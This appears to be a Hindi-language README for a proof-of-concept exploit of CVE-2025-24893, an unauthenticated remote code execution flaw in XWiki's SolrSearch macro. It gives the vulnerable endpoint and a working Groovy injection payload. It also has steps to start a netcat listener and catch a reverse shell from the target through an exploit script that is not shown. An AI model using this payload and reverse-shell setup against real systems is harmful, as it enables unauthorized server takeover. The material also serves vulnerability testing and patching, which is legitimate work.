
CVE-2025-24893 XWiki में एक गंभीर बिना प्रमाणीकरण वाली दूरस्थ कोड निष्पादन भेद्यता है (संस्करण < 15.10.11, 16.4.1, 16.5.0RC1), जो SolrSearch मैक्रो में Groovy अभिव्यक्तियों के अनुचित प्रबंधन के कारण उत्पन्न होती है।
⚠️ XWiki में बिना प्रमाणीकरण के रिमोट कोड निष्पादन
🛠️ @dollarboysushil द्वारा PoC कार्यान्वयन
CVE-2025-24893 XWiki में एक गंभीर RCE भेद्यता है, जो SolrSearch मैक्रो के भीतर असुरक्षित Groovy एक्सप्रेशन हैंडलिंग के कारण उत्पन्न होती है। एक हमलावर एक क्राफ्टेड GET अनुरोध के माध्यम से Groovy कोड इंजेक्ट कर सकता है, जिससे रिमोट कोड निष्पादन होता है (कोई प्रमाणीकरण आवश्यक नहीं)।
यह भेद्यता XWiki के SolrSearch मैक्रो (Main.SolrSearch) में निहित है, जो असुरक्षित Groovy मूल्यांकन का उपयोग करके खोज इनपुट को संभालता है। यह मैक्रो उपयोगकर्ता-आपूर्ति इनपुट को सैनिटाइज़ करने में विफल रहता है, जिससे मनमाना कोड निष्पादन संभव होता है।
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
एक हमलावर text पैरामीटर में Groovy कोड इंजेक्ट कर सकता है, जिसे मैक्रो सिस्टम के भीतर अनुचित इनपुट हैंडलिंग के कारण सर्वर-साइड पर मूल्यांकित किया जाता है।
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}
यह भेद्य XWiki इंस्टेंस पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) की ओर ले जाता है।
भेद्य लक्ष्य 15.10.8 संस्करण चला रहा एक XWiki इंस्टेंस है, जो CVE-2025-24893 से प्रभावित है।

रिवर्स शेल कनेक्शन को कैप्चर करने के लिए हमलावर की मशीन पर Netcat लिसनर प्रारंभ करें:
nc -lvnp 1337

भेद्य XWiki एंडपॉइंट पर Groovy-आधारित RCE पेलोड पहुंचाने के लिए एक्सप्लॉइट स्क्रिप्ट CVE-2025-24893-dbs.py चलाएँ।

सफल निष्पादन पर, रिवर्स शेल लिसनर से वापस कनेक्ट होगा, जिससे हमलावर को सर्वर तक रिमोट एक्सेस मिल जाएगा।
